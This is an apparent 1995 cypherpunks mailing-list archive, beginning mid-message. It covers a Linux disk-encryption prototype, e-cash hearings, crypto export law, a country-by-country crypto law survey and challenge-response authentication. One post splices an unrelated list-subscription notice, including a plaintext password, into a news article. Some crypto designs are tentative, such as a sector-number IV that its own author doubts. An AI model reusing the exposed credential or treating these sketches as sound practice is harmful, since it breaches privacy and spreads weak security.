something infinitely flexible and configurable--why program in policy?--so 
that the user/admin can deal with a variety of threat models.

Another, more crypto related question--how to deal with IV's?  Right now, 
I'm using 512 byte sectors with CBC.  For each sector, the IV is the 
sector number.  This frustrates the known plaintext attack issue, but I'm 
not sure if such a simple scheme is really effective.  Probably not.

Then there is a whole host of issues relating to cryptographically 
hygienic programming practices...of which I am also pretty ignorant 
(especially on Unix.)

I guess you could say the software is at the "proof of concept" stage, 
and lacks all sorts of desirable features.  But it works (with many 
bugs I'm sure)...and I have to give credit to the Linux effort:  so far I've 
done this with nothing but the kernel source and the kernel hackers guide 
as a reference.  I took a look at doing this with Windows 95 and didn't 
even know where to start. (No, I'm not bashing Windows--I love Win95, use 
it all day at the office and get loads of work done with it--but Linux 
kernel hacking is much more fun.  An ideal world would have the Win95
UI/Plug & Play stuff coded on top of a Unix kernel :) 

In any case, suggestions, criticism, and comments are welcome.  The software
will eventually be GPL licensed when it is a bit more mature.

==
Johnathan Corgan       "For the first time in history, it is possible to
jcorgan@aeinet.com      have absolute privacy over arbitrary distances."
PGP Key Fingerprint:    4F 28 69 B8 76 2E 42 3E  8B 4C 12 BB 3A 43 D4 07


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBaCnU1Diok8GKihAQGyoQP+JAYyukotfejK84bm8olDs1GMd6zlwuXc
S+91DwrPRb8pyciEC6lIoLNS3coMgPdGTEksNNJMbuIXupJNnXnSum9XrPkMzEkG
gL/x6n6v4Jzm9B9IyvIV2R1UrIK893EGQbPKTIgGNNsvORJ/NB8nkoMfZalVlNnD
Hl3z3vaYgtU=
=grpJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 26 Jul 95 08:05:41 PDT
To: cypherpunks@toad.com
Subject: Economist on Data Deluge (NewsClip)
Message-ID: <199507261505.KAA06608@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


The Economist, July 22, 1995, pp. 77-78.


Data communications: Deluged


The World Wide Web, as its fans will tell you, lives up to its
name. This realm of the Internet lets you visit "home pages"
in Bangkok one moment and Bridlington the next. Yet bringing
home souvenirs is another matter. To pull all the nice goodies
on offer back to his own machine, the home Internaut must
squeeze them down a telephone wire. That slows things down,
sometimes a lot; this correspondent took two hours to download
100 seconds of the film "Interview with a Vampire". There must
be better ways to bring home the data.

There are. One is the cables that deliver television to two
out of three American homes. Companies such as Intel, General
Instruments and Zenith Electronics have been rushing to
perfect "cable modems" that squirt data into a personal
computer at speeds up to 4m bits per second -- 140 times
faster than the speediest telephone modems (28,800 bits per
second) used with PCs. But cable modems must wait for the
cable-TV companies to rewire their networks with two-way
connections; at the moment, cable TV is largely one way. Cable
companies such as Tele-Communications Inc, Viacom and Cox
expect to offer data connections with TV services within a
year.

Some Internet surfers are not prepared to wait that long. For
the past three months, some data-junkies in America have been
downloading from the sky. Hughes, having laid down a challenge
to the cable companies with its DirecTV satellite broadcasting
system, which is currently providing 150 channels to 500,000
subscribers, is now laying down another. Hughes Network
Systems of Germantown, Maryland, is offering a satellite
service called Direcrc that can beam down data to a subscriber
at a rate of 400,000 bits a second -- enough to transmit a
400-page document in less than a minute. With moderate
compression techniques, that would easily allow real-time
video.

For $995, the DirecPC customer gets a 61-centimetre (24-inch)
satellite dish, a coaxial cable, an adapter that fits inside
an IBM-type PC and the relevant software. Once installed,
subscribers pay $15.95 to download up to 30 megabytes of data
a month (which is a lot of text, but not much video). The
speed is many times faster than a special digital ISDN line
from the telephone company, and the initial cost less (though
with the ISDN line time is the only limit on the amount of
data downloaded). For an extra $24 a DirecPC customer can get
up to 130 megabytes a month.

The cable-TV companies are spending $7,000 or more a mile
(over $4,000 a kilometre) to make their cables funnel data out
as well as television in. Hughes has sidestepped this problem.
Subscribers send data out -- generally small bursts to request
information, transmit messages and the like -- through a
normal telephone modem. These few bytes can trigger a torrent
of returned data, taking the fast route to a Hughes ground
station, which beams it to a Galaxy IV communications
satellite in geosynchronous orbit. From there it is
retransmitted to the subscriber's mini-dish.

Apart from reaching the Internet and other online services
such as news, electronic shopping, stockmarket prices and
sports results, Hughes plans to use DirecPC and its successors
to distribute large packages of data on behalf of commercial
customers -- acting, in effect, as the Federal Express of the
digital world. The company has already signed a deal with IBM
to deliver software by satellite direct to shops, where it
will be replicated on disks or CD-ROMS at the customer's
request. Using better equipment, Hughes reckons it should have
no difficulty delivering digital packages at up to 2m bits a
second.

Sooner or later, the cable-TV companies will lick the "back
haul" problem. Then, one-way satellite systems such as DirecPC
may find themselves squeezed out of the business -- unless
they, too, offer subscribers the chance to talk back with a
mouth as big as their ears. Hughes has plans to allow such
interchanges through a system called Spaceway. Satellites with
huge antennae would pick up messages from little dishes and
relay them to other little dishes, allowing high
data-transmission rates all over the world. The company, with
a touch of hype, calls it an "information super skyway".

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 26 Jul 95 07:08:23 PDT
To: cypherpunks@toad.com
Subject: AP: Load Cash, Cruise Virtual Mall
Message-ID: <v02120d00ac3bfbc9aa61@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>WASHINGTON (AP)  A day in the financial life of a future consumer may
>begin something like this: Wake up, log in, download some e-cash into
>your PCs hard drive, then go cruise the virtual mall.
>
>Its on the verge of happening, experts told Congress on Tuesday. But
>some caution that, without planning and coordination, the brave new
>Internet world of a cashless, checkless society could turn into an
>electronic From: listproc@mcfeeley.cc.utexas.edu
>Date: Sat, 20 May 1995 07:09:01 -0500
>Reply-To: listproc@mcfeeley.cc.utexas.edu
>Sender: listproc@mcfeeley.cc.utexas.edu
>To: rah@shipwright.com
>Cc: grgcombs@mail.utexas.edu
>Subject: SUBSCRIBE MCIP ROBERT HETTINGA
>X-Comment: Unix List Processor, version 6.0c/940712/0
>
>You have been added to list mcip@mcfeeley.cc.utexas.edu.
>The system has recorded your address as
>
>                        rah@shipwright.com
>
>and in order for your messages to get posted (if the list accepts postings),
>you will have to send them from this address, unless the list does not require
>subscription for posting.
>If a message is ever rejected, please contact the list's owner:
>grgcombs@mail.utexas.edu
>
>Your initial password is 800971739. Please change it as soon as you can
>by issuing the following request to listproc@mcfeeley.cc.utexas.edu:
>
>                SET MCIP PASSWORD 800971739 new-password
>
>WARNING: Do not use your login password; you will be breaching security at your
>site.
>
>This system may accept Internet TCP/IP connections for processing of live
>requests, and the password will be used to give you subscriber privileges.
>For more information, send a 'help live' request to
>listproc@mcfeeley.cc.utexas.edu.
>
>For information on this service and how to use it, send the following
>request in the body of a mail message to listproc@mcfeeley.cc.utexas.edu:
>
>                        HELP
>
>All requests should be addressed to listproc@mcfeeley.cc.utexas.edu.
>We are currently working on making a better interface for MacPGP, and other
>cryptographic programs, for Macintoshes.  You can obtain our latest release
>of the MacPGP Kit from ftp://duke.bwh.harvard.edu/pub/adam/mcip (The
>official MCIP ftp site), or from
>http://www.utexas.edu/~grgcombs/htmls/crypto.html (The unofficially
>official MCIP home page).  Knowledge of programming is not mandatory, but
>it would be helpful.  Being at least a mild Mac user (either now or in the
>past) *is* mandatory.     -- Gregory S. Combs <grgcombs@mail.utexas.edu>
>NOTE:  For some reason our list processor doesn't like the version number
>in PGP signed messages, so unless you want me to have to forward everything
>you write to the MCIP list, please don't sign your mail.  (ironic isn't
>it? "Tower of Babel."
>
>"On the Internet ... it is difficult to tell if a transaction has taken
>place since there is no central authority to track and report it," said
>David M. Van Lear, chief executive of Electronic Payment Services Inc.,
>a 2 1/2-year-old joint venture of four banks.
>
>"There are currently no standard operating regulations," he said. "In
>addition, there is no central authority to track and report on criminal
>activity, including counterfeiting and money laundering."
>
>It was all a bit mind-boggling for members of the House Banking monetary
> policy subcommittee, whose chairman, Rep. Michael Castle, R-Del.,
>observed, "Some of us can barely read our e-mail."
>
>But, more than 25,000 merchants in 150 countries are already on the
>Internet, selling or advertising products and services to 20 million
>users, a figure that will grow to 100 million within five years,
>according to MasterCard International.
>
>So, Castle said, "it is time for lawmakers to start grappling with the
>implications of an entirely new monetary system in cyberspace, one that
> transcends national governments and national boundaries."
>
>For instance, how will the Federal Reserve Board measure the amount and
>velocity of money flowing through the Internet? How will the Internal
>Revenue Service audit transactions conducted anonymously without paper
>records? What laws apply when a U.S. consumer orders a product from a
>business overseas and the goods never arrive?
>
>The lawmakers received seemingly conflicting advice from a panel of
>experts that included Van Lear, executives from MasterCard and Visa
>U.S.A. and Scott Cook, the chairman of the personal finance software
>company, Intuit Inc.
>
>They were told that government will be crucial to fostering stability of
> the new electronic monetary system and public trust in it but that
>premature or too much regulation could stifle innovation.
>
>The new technology, the experts said, will both open new avenues for
>fraud and offer new protections and safeguards.
>
>The system, some said, needs to be fully auditable so tax and criminal
>authorities can reconstruct a series of transactions but it also should
>protect Americans privacy.
>
>For instance, David Chaum, the pony-tailed chairman of DigiCash Inc.,
>said his version of electronic cash, or e-cash, would provide the same
>privacy protection and anonymity in small transactions as traditional
>cash.
>
>Using encrypted codes and special software that offer much more security
> than the current unprotected transfer of credit card information via
>the Internet, consumers could download cash into the hard drive of their
> personal computers.
>
>They'd spend it by transferring it to merchants via computer. Or they
>could store the cash on "smart cards" equipped with a computer chip
>capable of storing far more information than the magnetic strips now on
>credit and debit cards.
>
>The cards then would function like pocket money and could be used in
>vending machines, parking meters and subway turnstiles equipped to
>receive them.
>
>MasterCard International and Visa are developing similar smart cards
>but, unlike Chaum's, theirs would generate an audit trail that could
>help law enforcement officials combatting tax evasion, counterfeiting
>and money laundering.
>
>Rosalind L. Fisher, executive vice president of Visa, a consortium of
>financial institutions, urged Congress to maintain public confidence in
>new forms of electronic payment by allowing them to be offered only
>through institutions to supervision by banking regulators.
>
>At the same time, she said, we are concerned that additional regulation
> in this area will "stifle innovations ... subjecting many of these
>products to ... premature death."
>
>By way of example, she cited a Federal Reserve regulation that, if
>applied, could require machines accepting smart cards to issue paper
>receipts, ruining the economic viability of the cards for such small
>purchases as a 75-cent soda.
>
>Castle, who plans at least one more hearing on the future of money this
>fall, agreed that Congress should hold off on legislating for now but
>should be prepared to move quickly if problems develop.
>
>"I dont think we need regulations now, but we had better be ready to
>respond ... if some guy can crack a code and create a million-dollar
>account, transfer it around a couple times and end up in the Bahamas,"
>he said.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 26 Jul 95 08:28:57 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <2751@umlaw.demon.co.uk>
Message-ID: <9507261527.AA17090@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <2751@umlaw.demon.co.uk> Michael Froomkin writes:
>> Therefore, the only organization which can hold a
>> senator/representative liable for passing a bad law is the one which
>> passed the law. :(

>and the voters

Not in the sense of being able to punish him.  The voters may only
withold their support in the next election.  Not nearly enough to
deter morons like Exon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 26 Jul 95 08:44:46 PDT
To: cypherpunks@toad.com
Subject: Re:      Crypto Law Survey
In-Reply-To: <MAILQUEUE-101.950726125335.448@frw3.kub.nl>
Message-ID: <D2ou9c1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I seem to recall that COCOM voted itself out of existence last year.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Wed, 26 Jul 95 04:13:03 PDT
To: sjb@austin.ibm.com
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
Message-ID: <2752@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In message <9507251610.AA16331@ozymandias.austin.ibm.com> Scott Brickner writes:

> Therefore, the only organization which can hold a
> senator/representative liable for passing a bad law is the one which
> passed the law. :(
> 
and the voters
-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087 "Rain in parts, then dry" --BBC
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Amir Y. Rosenblatt" <axon@neuron.net>
Date: Wed, 26 Jul 95 07:50:42 PDT
To: cypherpunks@toad.com
Subject: NSA and the NCSA/Apache web servers
Message-ID: <Pine.SOL.3.91.950726103519.23445C-100000@pipe6>
MIME-Version: 1.0
Content-Type: text/plain



I was flipping through the Apache http Server Project's web site 
<http://www.apache.org/>  when I came across the following note:

   Note: We were informed by NCSA that the NSA (The US National Security
   Agency - yes, the folks who in 1994 said "we're only 10 years 
   behind schedule")  considered the hooks to encryption in NCSA's httpd 
   to be in violation of the munitions export law, thereby making its 
   distribution to foreign sites illegal. For various reasons, we decided 
   to remove the -DPEM_AUTH code completely.

This was followed by a pointer to http://www.apache.org/nopgp.html from 
which the following text was taken:

   On May 17th, 1995, we were asked by a representative of NCSA to remove 
   any copies of NCSA httpd prior to 1.4.1 from our web site. They were 
   mandated by the NSA to inform us that redistribution of pre-1.4.1 code 
   violated the same laws that make distributing Phill Zimmerman's PGP 
   package to other countries illegal. There was no encryption in NCSA's
   httpd, only hooks to publicly available libraries of PEM code. By the 
   NSA's rules, even hooks to this type of application is illegal. 

Wow -- hooks to encryption are unexportable -- now THAT's bullshit.  Sheesh.

	-Amir

       /\     Set the controls for the heart of the sun.    -Pink Floyd    
______/  \    ___________ __ __  _  _  _  _   .   .   . axon@neuron.net
          \  / 
           \/    For PGP 2.6 key send mail with subject: SEND PGPKEY





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Tue, 25 Jul 95 21:19:20 PDT
To: Joel Hames <jhames@deltanet.com>
Subject: Banks on the Net (Was: Re: Questions about Conferences)
In-Reply-To: <9507251837.AA29943@deltanet.com>
Message-ID: <Pine.LNX.3.91.950726120904.8248A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 25 Jul 1995, Joel Hames wrote:

> 3)  Has anyone heard much about the security of First Security National
> Bank? (www.fsnb.com)

No such bank or domain: maybe you mean Security First Network Bank 
(www.sfnb.com). 

In any case, http://www.cybercash.com/directory.html contains a list of 
banks in USA, Canada and UK sporting Web pages.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Wed, 26 Jul 95 12:48:32 PDT
To: cypherpunks@toad.com
Subject: Challenge-response passwords (Was: big word listing)
Message-ID: <199507261944.MAA20832@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:59 PM 7/25/95 +0100, Andrew Spring wrote:
>Free-after-1997 example:
>        g is a generator of a prime p.
>        password is X (0<X<p);
>        password file has g^X mod p.
>        login server generates Y, issues challenge g^Y.
>        expected response is g^XY mod p
>        login client has X, generates (g^Y)^X = g^XY mod p.
>        J. Random SuperHacker can get g^X, and g^Y, but not g^XY.

It's _not_ free after 1997!  I thought of it last fall, was surprised I couldn't
find it anywhere in the literature, given that it's pretty obvious,
but eventually found that a guy from Siemens had patented it in Germany
and then gotten a US patent in ~1994.  Unfortunately, he phrased it in terms of
"commutative hash functions", with g^X mod p as an example, so it's more
general.
He also extended it to do two-way authentication (obviously the process can be
symmetrical if the user has a stored g^W from the server and can send a
challenge,
but he found a way to save a step or two.)

I developed it because I was looking for a way to do authentication-only
public key stuff so the code would be exportable - this approach doesn't
generate a shared secret (since the otherwise-secret g^XT is exposed
as the response to the challenge.)  However, it's possible to extend it to
preserve the shared secret - instead of sending response g^XY mod p, send
        Hash(g^XY mod p)
and have the login server validate that.  One advantage is that the hash
can be much shorter than the whole g^XY mod p, e.g. 32-64 bits instead of
512-1024.

And you can now use (g^XY mod p) as a session key (for encrypted sessions)
or an authenticator (e.g. send Hash(Data,sequence#,sessionkey) as a MAC for
each packet.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 26 Jul 95 12:51:31 PDT
To: wb8foz@nrk.com
Subject: Re: NRC panel wants questions for Law Enforcement on crypto policy
In-Reply-To: <199507261746.NAA00249@october.ducktown.org>
Message-ID: <9507261951.AA23210@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


I collated all the questions into a large ungainly message and sent it
to Herb Lin.  He has been after me to go back over it and make a more
useful set of questions, which I haven't done yet.  He says they are
meeting with the FBI in September and want to get questions to them in
August (incorporating our ideas).  I've promised him I will get him the
formatted list of questions by the end of next week.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Wed, 26 Jul 95 03:54:38 PDT
To: cypherpunks@toad.com
Subject: Crypto Law Survey
Message-ID: <MAILQUEUE-101.950726125335.736@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


In a separate message is my survey of cryptography laws.

I welcome comments and corrections, but mail me before 31 July, as
I'm going on a six weeks' holiday next week.

I shall try and keep an updated version on my homepage, where it will
be available in a few weeks. To make the survey as wide and accurate
as possible, I greatly appreciate receiving additional information.

Regards,
Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 66 8101
Centre for Law and Informatization      facs    +31 13 66 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                               --------------------------------------
Postbus 90153                 |       "We forgot the crackers!"      |
5000 LE Tilburg               |                                      |
The Netherlands               |           Wallace and Gromit         |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: E.J.Koops@kub.nl
Date: Wed, 26 Jul 95 03:54:47 PDT
To: cypherpunks@toad.com
Subject: Crypto Law Survey
Message-ID: <MAILQUEUE-101.950726125335.448@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


    CRYPTO LAW SURVEY
    Version July 1995
    Bert-Jaap Koops (koops@kub.nl)
    Please credit if quoting.
    
    This survey of cryptography laws is based on several reports and on
    replies to a posting on Internet discussion lists. Only for France, The
    Netherlands, and Russia have I consulted original texts of relevant
    regulations; for the other countries, the reports listed below served as the
    only source. These findings, therefore, do not pretend to be exhaustive
    or fully reliable.
    I thank all who have provided me with information for this survey.
    Please send comments, corrections, updates, additional information, and
    questions to E.J.Koops@kub.nl.
    
    SOURCES
    [1]   KPMG EDP Auditors, Rapport aan de Ministers van 
    Binnenlandse Zaken, Justitie en Verkeer en Waterstaat inzake
    de uitkomsten van het Bedrijfseffectenonderzoek Cryptografie
     (Amstelveen, 7 april 1994), pp. 27-38, 107-114
    [2]   Moret Ernst & Young EDP Audit Management Services,
    Eindrapport onderzoek ontwerp-regeling encryptie,
    (Amsterdam, 1 maart 1994), pp. 21-30
    [3]   James P. Chandler, Diana C. Arrington, Donna R.
    Berkelhammer, and William L. Gill, Identification and Analysis
    of Foreign Laws and Regulations Pertaining to the Use of 
    Commercial Encryption Products for Voice and Data 
    Communications, DOE Project No. 2042-E024-A1, Washington, January 1994
    [4]   Andr Sylvain, Data Encryption and the Law(s) - Results, 
    posted on talk.politics.crypto, 15 December 1994
    [5]   various references; personal communications by Adam Back, 
    Peter Gervai, Ulf Moeller, Marc Plumb, and Thomas Quinot.
    
    -----------------------------------------------------------------------------------
    SURVEY PER COUNTRY
    1. Export/ import regulations
    2. Other laws/regulations pertaining to encryption
    3. Threats/ intentions to regulate encryption
    4. Regulations stimulating encryption use
    -----------------------------------------------------------------------------------
    
    _COCOM_
    1. COCOM (Coordinating Committee for Multilateral Export Controls)
    is an international organization (Japan, Australia, and all NATO
    members, Ireland excluded) for the mutual control (and restriction) of
    strategic arms export. It maintains, among others, the International
    Industrial List and the International Munitions List. In 1991, COCOM
    has decided to allow export of mass-market cryptographic software
    (including public domain software). Some member countries of COCOM
    follow its regulations, but others, such as Germany and the
    United States, maintain separate regulations.
    
    _Australia_ [1, 3]
    1. Written permission is needed for exporting cryptographic equipment
    designed to ensure the secrecy of communications or stored information.
    2. no
    3. no
    
    _Austria_ [1]
    2. no
    3. no
    
    _Belgium_ [1, 3]
    1. no
    2. no
    3. no
    
    _Brazil_ [3]
    1. no
    
    _Canada_ [1, 3, 4, 5]
    1. Canada follows COCOM regulations. The exportation of items from
    Canada may be subject to restriction if they are included on the Export
    Control List. All types of cryptography can be transported between
    Canada and the United States, but cryptography imported from the US
    remains under US ITAR rules and cannot be exported if the US does not
    allow export.
    2. no
    3. no (but Canada is monitoring the debate in the US)
    
    _People's Republic of China_ [3]
    1.China restricts the importation and exportation of voice-encoding
    devices.
    
    _Denmark_ [1, 4]
    2. no
    3. no
    4. The Danish Teletrust Group has set up an Encryption Group to work
    on the technical and legal concept of public-key certifying authorities. A
    Centre Certifying Auhtority (CCA) would coordinate control and
    certification of key centres to provide secure keys within
    telecommunications. It would be necessary for such a CCA to have a
    legal basis. The Danish government has not (yet) implemented the
    initiative into law.
    
    _European Union_ [5]
    2. no
    3. There are rumours that the EU is working on the establishment of a
    key escrow system to counter the US Clipper initiative. The EU system
    would allow member states to choose escrow agents where keys have to
    be deposited. The European Community's Green Book on the Security
    of Information Systems (Draft 4.0, 18 October 1993) poses a case for
    the provision of "Public Confidentiality Services" (which offer some sort
    of Government Access to Keys).
    
    _Finland_ [4, 5]
    2. no
    3. no
    
    _France_ [1, 3, 4]
    1. a) For exporting authentication- or integrity-only cryptography, a
    declaration dossier of export delivery must be deposited. A copy of the
    receipt of declaration must be presented to customs at each exportation.
    For temporary exportation, a user declaration will serve as export
    declaration in the case of cryptography used exclusively for personal use
    by an individual. A delivery declaration will serve as temporary-export
    declaration for a sample.
    b) For exporting any other kind of cryptography, apart from once
    depositing administrative and technical details needed for user or
    delivery authorisation, a license is needed for each exportation.
    2. Delivery, exportation, and use of cryptography are subjected to:
    a) previous declaration if the cryptography can have no other object than
    authenticating communications or assuring the integrity of transmitted
    messages;
    b) previous authorisation by the Prime Minister in all other cases.
    Simplified procedures exist for certain cryptography products or certain
    user categories. 
    For both declaration and authorisation, a dossier containing technical
    details and administrative data must be submitted. Authorisation can be
    subjected to certain conditions in order to reserve the use of certain
    types of cryptography to defined user or application categories.
    It is unclear to what extent this regulation is being maintained in practice.
    It seems impossible for individuals or enterprises to obtain authorisation
    for "strong" cryptography, such as RSA. Moreover, the office dealing
    with authorisation renders decisions without motivation.
    
    _Germany_ [1, 3, 4, 5]
    1. COCOM regulations, but Germany maintains export control of both
    public domain and mass-market encryption software.
    2. no
    3. Some politicians have expressed a desire to regulate cryptography,
    but, on the whole, there seems to be no threat that Germany will prepare
    a law on cryptography.
    
    _Hungary_ [5]
    2. no
    3. no
    4. There is a law that provides an agency with the competence to assess
    cryptography; the agency can declare that it satisfies a minimum security
    level.
    
    _Iceland_ [1]
    2. no
    3. no
    
    _India_ [3]
    1. no
    
    _Ireland_ [1]
    2. no
    3. no
    
    _Israel_ [3]
    1. Israel imposes restrictions on encryption, but the scope of its
    restrictions is not clear.
    
    _Italy_ [1, 3]
    1. COCOM regulations.
    2. There is a law that demands accessibility of encrypted records for the
    treasury.
    3. no
    
    _Japan_ [1, 3]
    1. COCOM regulations.
    2. no
    3. no
    
    _Latvia_ [4]
    2. no
    3. no
    
    _Mexico_ [3]
    1. no
    
    _The Netherlands_ [3, 4, 5]
    1. Public domain and mass-market software generally does not require a
    validated license. Items capable of file encryption do require a validated
    license.
    2. no
    3. In March 1994, a Dutch predraft law on cryptography leaked out, the
    drift of of which was a prohibition of having, using, or trading strong
    cryptography. Those with a "legitimate concern" could apply for a user
    license or a trade authorization. One condition for granting a license was
    giving information to an administration agency; the text did not state
    whether this information concerned only the algorithm or also all the
    keys used.
    After many protests from those who would be affected by the proposed
    regulation, it was withdrawn. The Dutch authorities are currently
    studying on alternatives to handle the issue.
    Although the draft regulation will not be continued in its present scope,
    it shows how much the judicial authorities fear wide dissemination of
    strong cryptography. It is to be expected that the Dutch government will
    want to regulate encryption in some way.
    
    _New Zealand_ [1]
    2. no
    3. no
    
    _Norway_ [1]
    2. no.
    4. A bill on information security has been proposed, which indicates that
    cryptography can be used for the storage of passwords. It is not sure if
    and when this bill will come into force.
    A bill has been proposed on central medical registries that would use
    cryptographically pseudonimized entries.
    
    _Russia_ [3, 5]
    1. A license is required for the importation of encryption facilities
    manufactured abroad.
    2. On 3 April 1995, president Jeltsin issued a decree prohibiting
    unauthorized encryption. State organizations and enterprises need a
    license to use encryption (for both authentication and secrecy, for
    storage as well as transmission). Other enterprises and organizations
    using uncertified cryptography do not receive state orders. The Central
    Bank shall take measures against commercial banks that do not use
    certified cryptography when communicating with divisions of the Central
    Bank. The development, production, implementation, or operation of 
    cryptography without a license is prohibited.
    
    _Saudi Arabia_ [3]
    1. no
    
    _South Africa_ [1, 3]
    1. no
    2. The South African situation is unclear. There appears to be legislation
    prohibiting the encryption of data on public telephone networks, but
    many companies and banks seem to ignore the legislation and do encrypt
    their data.
    
    _Spain_ [1]
    2. no
    3. no
    
    _Sweden_ [3, 4]
    1. no
    2. no
    3. no
    
    _Switzerland_ [1, 3]
    1. no
    2. no
    3. no
    
    _Turkey_ [1]
    2. no.
    3. no
    
    _United Kingdom_ [1, 3, 4, 5]
    1. COCOM regulations.
    2.  no
    3.  In its policy on the information superhighway, Labour states it does
    not approve of escrowed encryption, but it wishes authorities to have the
    power to demand decryption under judicial warrant.  It seems, then, that
    Labour intends to penalize a refusal to comply with a demand to decrypt
    under judicial warrant.
    
    _United States of America_ [1, 2, 4]
    1. The International Traffic in Arms Regulation restricts export of
    "dual-use" cryptography (that is, cryptography that can serve both
    civilian and military purposes) by placing it on the Munitions List. For
    (relatively strong) products that can encipher information, an export
    license is usually issued only for use by foreign branches of American
    enterprises and for use y financial institutions. "Weak" cryptography
    (e.g., with a certain maximum key-length) can also be exported.
    Export of cryptography that serves only authentication or integrity
    purposes is ruled by the Export Administration Regulations. Some types
    of public domain software have been decontrolled and are now on the
    Commerce Control List.
    Several initiatives, as yet unsuccessful, have been taken, both in
    Congress and by the public, to try to mitigate the cryptography export
    restrictions.
    2. no
    3. In 1993, the Clinton Administration announced the Escrowed
    Encryption Initiative (EEI), usually referred to as the Clipper Initiative,
    after its first implementation in the Clipper chip. A classified, secret-key
    algorithm, SKIPJACK, has been implemented in an Escrowed
    Encryption Standard (EES). The reported basic idea of the EEI is to
    provide citizens with a safe cryptosysem for securing their
    communications without threatening law enforcement.
    The EES procures law enforcement access by means of a Law
    Enforcement Access Field (LEAF) that is transmitted along with each
    encrypted message; the field contains information identifying the chip
    used. Law enforcement agencies wire-tapping communications
    encrypted with EES can decipher tapped messages by obtaining the two
    parts of the chip's master key that are deposited with two escrow
    agencies (National Institute of Standards and Technology
    and the Treasury Department's Automated Systems Division), provided
    they have a court order for the tapping.
    The EES is a voluntary standard to be used in telephone
    communications. Privacy advocates fear that the government may
    declare escrowed encryption obligatory once it has captured a
    sufficient portion of the market. It is doubtful that EES will be widely
    accepted, though, given the scepticism with which the majority of US
    citizens presently regard escrowed encryption or government access to
    keys.
    On June 27, 1995, Senator Grassley introduced the Anti-Electronic
    Racketeering Act (S.974), which, if enacted, would virtually ban
    encryption. Only the use of  escrow-like software would be an
    affirmative defense for those prosecuted for using cryptography. The bill
    doesn't seem to have much support at present.
    4. The Utah Digital Signatures Act of 1995 provides a legal framework
    for the use of cryptography for authentication and integrity purposes.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gt7508b@prism.gatech.edu (PHrEaK!)
Date: Wed, 26 Jul 95 10:25:56 PDT
To: skaplin@mirage.skypoint.com (Samuel Kaplin)
Subject: Re: Defcon agenda
In-Reply-To: <Pine.SV4.3.91.950726022003.29B-100000@mirage>
Message-ID: <199507261722.NAA22774@acmew.gatech.edu>
MIME-Version: 1.0
Content-Type: text


> Can some kind soul forward me a copy of the agenda for Defcon? I need 
> dates and times for the various speakers.
> 
> Thanks,
> Sam
> 
You can get it from http://underground.org/conventions/defcon/defcon3/


-- 
=-=-=-=-=-=-= Tom Cross AKA The White Ninja / Decius 6i5 */^\* -=-=-=-=-=-=-=-
-=-=-=-=-=- TWN615@mindvox.phantom.com  GT7508B@prism.gatech.edu =-=-=-=-=-=-=
=- "Government is not a reason, not an eloquence; it is a force. Like fire, =-
-=- it is a dangerous servant and a fearful master." -- George Washington -=-=



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
